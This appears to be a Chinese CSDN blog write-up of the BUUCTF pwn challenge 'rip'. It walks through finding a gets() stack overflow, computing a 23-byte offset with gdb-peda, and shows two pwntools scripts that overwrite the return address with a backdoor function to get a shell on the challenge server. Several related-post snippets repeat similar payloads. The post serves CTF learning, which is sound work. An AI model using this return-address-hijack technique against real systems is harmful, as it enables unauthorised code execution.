buu rip

最新推荐文章于 2023-07-13 11:41:11 发布
最新推荐文章于 2023-07-13 11:41:11 发布
阅读量1.9k 收藏 6
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/110959284
版权

连接上题目环境后,发现可以输入字符,然后得到返回
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
在这里插入图片描述
用IDA分析程序,发现主函数和一个名为fun的子函数
在这里插入图片描述
先看main函数的汇编代码和伪代码
在这里插入图片描述
get很明显没有限制输入,那么就存在溢出的漏洞,在字符串表中又发现了/bin/sh的字符,在fun函数中用了system函数进入到/bin/sh,那么就可以通过将fun函数的地址覆盖到返回地址就可以实现溢出获得系统权限
双击s查看输入点在栈的位置,发现只需存入15个字节即可劫持函数返回地址,因此 最后偏移量为 :15+8 = 23,8个字节是返回地址和fun函数的地址
在这里插入图片描述
这里也可以使用peda来计算偏移量
先用gdb加载文件进行调试
在这里插入图片描述
生成溢出字符,保证长度可以覆盖到栈即可

gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

执行 r 或者 start 命令让程序运行。//注意 start 命令执行后,还需执行 contin 命令。
在 please input 命令后,将之前生成的溢出字符串粘贴上去。
注意到 RBP寄存器。也可以计算此时 nAACAA-A 的偏移量:
在这里插入图片描述找到 stack 复制栈顶的字符串 // 前四个字节(64 bits为前8个字节) 计算偏移量

执行 pattern offset xxxxxx 命令。

pattern offset A(AADAA;

在这里插入图片描述
得到偏移量 23

这时要知道fun函数的入口地址
在这里插入图片描述

exp编写步骤:
 
from pwn import * #引入pwn库

p = remote(ip, port) # 输入对应的ip地址和端口号来连接其他主机的服务

# 输入payload来进行操作以拿到程序的shell payload一般等于 偏移量 + 地址

p.interactive() # 反弹shell

exp1:

from pwn import *

p = remote('node3.buuoj.cn',28109)
payload = b'a'*23+p64(0x401185)+p64(0x401186)
p.sendline(payload)
p.interactive()

exp2:

from pwn import *

p = remote('node3.buuoj.cn',28109)
payload = b'a'*15+p64(0x401186)
p.sendline(payload)
p.interactive()

在这里插入图片描述

沫忆末忆
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
buu rip1
weixin_42238862的博客
10-02 1万+
文章目录前言一、看看程序有没有保护二、对程序源码进行分析1.判断溢出点2.手动测试溢出字符长度3.EXP总结 前言 本人刚刚入坑二进制不久,因为以前主玩渗透测试,所以喜欢学习理论的同时,做一些实战的题目,这不就在BUU上看到了一道pwn的入门题RIP1,但是这个题也让我知道二进制的门槛不是一般的高,第一次写文章,大佬勿喷! 一、看看程序有没有保护 常规操作,查看程序的位数以及各种保护机制!可以看到程序是linux下的程序为64位,并且没有开启任何保护 二、对程序源码进行分析 1.判断溢出点 把程序拖进
BUU-rip
qq_45771413的博客
04-27 685
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
BUU RIP网上WP的个人理解
weixin_46287316的博客
12-13 590
BUU RIP 具体的WP可以参照其他博主的WP。 这里我仅分享我对这两个payload可以成功的一些理解。 payload = b'a' * 23 + p64(0x401186 + 1) payload = b'a' * 23 + p64(0x401198) + p64(0x401186) 相关知识点: 栈对齐:栈指针要能被16字节整除,(但是我用的64位Ubuntu20,是8字节) 而至于为什么这两个payload能用,感觉和我所理解栈对齐没什么关系。原因应该是system函数中有一条指令需要
buu_rip
m0_52231248的博客
11-02 191
题目提示了Ubuntu18,默认libc2.27 checksec显示开了canary和nx gets存在栈溢出漏洞,offest=0xf+8 发现程序中存在后门函数fun,plt地址0x401186 程序没有开启aslr,因此直接溢出后跳转后门函数即可。 但Ubuntu18我们需要先pop rdi才能调用system函数 没有找到pop rdi ret 但找到了同样可以栈平衡的retn 地址:0x401185 Exp: fro...
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 280
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4995
BUU CTF PWN 入门知识详解
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1314
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
BUUCTF】rip
^_^
12-08 3285
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1288
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
ret2shellcode
qq_45691294的博客
12-18 4643
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例题 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
ciscn_2019_s_3
qq_45691294的博客
12-29 2158
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
get_started_3dsctf_2016
qq_45691294的博客
12-17 1334
先进入到题目环境里,程序接收用户输入,然后返回一串字符 checksec查看一下保护,只开启了NX,堆栈不可执行保护 用IDA分析程序,这一段程序很简短,gets函数存在溢出 发现了一个名为get_flag的函数 通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag 思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了 这里可以用本地调试判断偏移量
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值